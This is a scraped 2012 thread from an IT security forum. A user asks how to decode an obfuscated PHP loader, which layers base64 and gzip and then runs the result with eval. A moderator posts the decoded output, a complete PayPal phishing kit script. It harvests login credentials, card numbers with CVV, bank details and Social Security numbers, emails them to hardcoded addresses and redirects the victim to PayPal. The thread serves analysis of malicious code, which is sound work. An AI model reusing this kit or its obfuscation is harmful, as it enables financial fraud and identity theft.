Waraxe IT Security Portal
Login or Register
November 5, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 112
Members: 0
Total: 112
Full disclosure
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
APPLE-SA-10-28-2024-3 macOS Sequoia 15.1
APPLE-SA-10-28-2024-2 iOS 17.7.1 and iPadOS 17.7.1
APPLE-SA-10-28-2024-1 iOS 18.1 and iPadOS 18.1
Open Redirect / Reflected XSS - booked-schedulerv2.8.5
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other hashes -> how to decode this file base64
Post new topicReply to topic View previous topic :: View next topic
how to decode this file base64
PostPosted: Sun Aug 26, 2012 7:52 pm Reply with quote
kyo1992
Advanced user
Advanced user
Joined: Jul 03, 2010
Posts: 54




hello i need to decode this piece of code


Quote:

$ThisFlsSRC = @file_get_contents($LoadedFile) or die("Error Runing This File !");
$ThisFls = @explode("#walis#",$ThisFlsSRC);
$SourceFls = $ThisFls[1];
for($i=1;$i<=30;$i++){
$SourceFls = base64_decode(gzuncompress(base64_decode($SourceFls)));
}
eval($SourceFls);
exit;


$SourceFls i think is : http://www.4shared.com/zip/whyDLDm_/crypt.html?

thank you
View user's profile Send private message
PostPosted: Sun Aug 26, 2012 8:45 pm Reply with quote
demon
Moderator
Moderator
Joined: Sep 22, 2010
Posts: 485




post the base64 encoded file here

never mind got it decoded:
Code:
<?php

ob_start();
if(file_exists('config.php')){
include_once('config.php');
}else{
die('config.php Not Found !!');
}
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$YWaLiS_Result = "==================+ (PayPal US Bank Spam ReZulT) +==================\n";
$YWaLiS_Result .= "email address : ".$_POST['login_email']."\n";
$YWaLiS_Result .= "password : ".$_POST['login_password']."\n\n";
$YWaLiS_Result .= "first name : ".$_POST['first']."\n";
$YWaLiS_Result .= "last name : ".$_POST['last']."\n";
$YWaLiS_Result .= "Date of Birth : ".$_POST['date']."/".$_POST['bday']."/".$_POST['byear']."\n";
$YWaLiS_Result .= "Routing number : ".$_POST['routing']."\n";
$YWaLiS_Result .= "Account number : ".$_POST['account']."\n";
$YWaLiS_Result .= "Bank name : ".$_POST['bank']."\n";
$YWaLiS_Result .= "Card Type : ".$_POST['type']."\n";
$YWaLiS_Result .= "Card Number : ".$_POST['card']."\n";
$YWaLiS_Result .= "Expiration of Date : ".$_POST['expiration']."/".$_POST['bday1']."/".$_POST['byear1']."\n";
$YWaLiS_Result .= "Card Verification Number : ".$_POST['ccv']."\n";
$YWaLiS_Result .= "Social Security Number : ".$_POST['ssn']."\n";
$YWaLiS_Result .= "Address line 1 : ".$_POST['line1']."\n";
$YWaLiS_Result .= "Address line 2 : ".$_POST['defaultaddress2']."\n";
$YWaLiS_Result .= "City/State : ".$_POST['city']."\n";
$YWaLiS_Result .= "ZIP code : ".$_POST['zip code']."\n";
$YWaLiS_Result .= "Phone number : ".$_POST['phone']."\n\n";
$YWaLiS_Result .= "============================================\n";
$YWaLiS_Result .= "Client IP : ".$ip."\n";
$YWaLiS_Result .= "HostName : ".$hostname."\n";
$YWaLiS_Result .= "-------------------- By Y-WaLiS-----------------------\n";
$EmailSubject = "$ip";
$SpmsEmails = array();
$SpmsEmails[] = "bmspmr@gmail.com";
$SpmsEmails[] = "rezult4spam@gmail.com";
$SpmsEmails[] = $SpamerEmail;
foreach($SpmsEmails as $Email){
@mail($Email,$EmailSubject,$YWaLiS_Result);
}
unset($SpmsEmails,$Email);
@header("Location:https://www.paypal.com/");
?>

_________________
Go BIG or go HOME !
View user's profile Send private message
how to decode this file base64
www.waraxe.us Forum Index -> All other hashes
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.043 Seconds